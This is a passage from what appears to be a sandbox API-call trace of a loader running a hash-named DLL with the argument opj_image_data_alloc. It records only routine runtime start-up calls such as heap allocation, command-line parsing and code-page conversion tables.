¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0288.326] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x100) returned 0x561a80 [0288.326] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0288.326] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17c) returned 0x559640 [0288.339] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0288.339] GetLastError () returned 0x0 [0288.339] SetLastError (dwErrCode=0x0) [0288.339] GetEnvironmentStringsW () returned 0x5650f0* [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9cc) returned 0x565ad0 [0288.339] FreeEnvironmentStringsW (penv=0x5650f0) returned 1 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x118) returned 0x559950 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3e) returned 0x561170 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x5c) returned 0x550780 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x5547a0 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x78) returned 0x5555e0 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x554510 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x28) returned 0x55b160 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x561300 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x55b2e0 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x560d60 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x554000 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x55e4c0 [0288.339] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x55e140 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1c) returned 0x55b3d0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd2) returned 0x555870 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x7c) returned 0x553c20 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x560bd0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x90) returned 0x5520d0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b190 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x55e2c0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x36) returned 0x55e180 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x560860 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x5590a0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x560fe0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd6) returned 0x5551b0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x55e500 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55afb0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x55e5c0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x558f80 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x559100 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b4f0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x42) returned 0x560ef0 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x55e400 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x44) returned 0x560c20 [0288.340] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b010 [0288.340] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565ad0 | out: hHeap=0x550000) returned 1 [0288.341] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1000) returned 0x5650f0 [0288.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0288.341] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0288.341] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc" [0288.341] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x559310*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0288.342] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") [0288.347] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.347] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0288.347] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.347] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0288.348] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0288.348] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.349] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0288.349] GetProcessHeap () returned 0x550000 [0288.349] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.349] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0288.349] GetLastError () returned 0x0 [0288.349] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0288.350] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0288.350] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c8) returned 0x566580 [0288.350] SetLastError (dwErrCode=0x0) [0288.350] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1200) returned 0x566950 [0288.352] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0288.352] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0288.352] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0288.352] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0288.352] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc" [0288.352] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc" [0288.353] GetACP () returned 0x4e4 [0288.353] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x228) returned 0x554290 [0288.353] IsValidCodePage (CodePage=0x4e4) returned 1 [0288.353] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0288.353] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0288.353] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.353] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0288.353] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0288.354] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.354] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0288.354] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.354] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0288.354] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0288.354] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0288.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0288.354] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.354] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0288.354] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0288.354] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0288.354] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0288.355] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0288.355] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1000) returned 0x567b60 [0288.355] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0288.355] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0288.355] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0288.355] AreFileApisANSI () returned 1 [0288.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0288.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0288.355] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xce) returned 0x554b40 [0288.356] 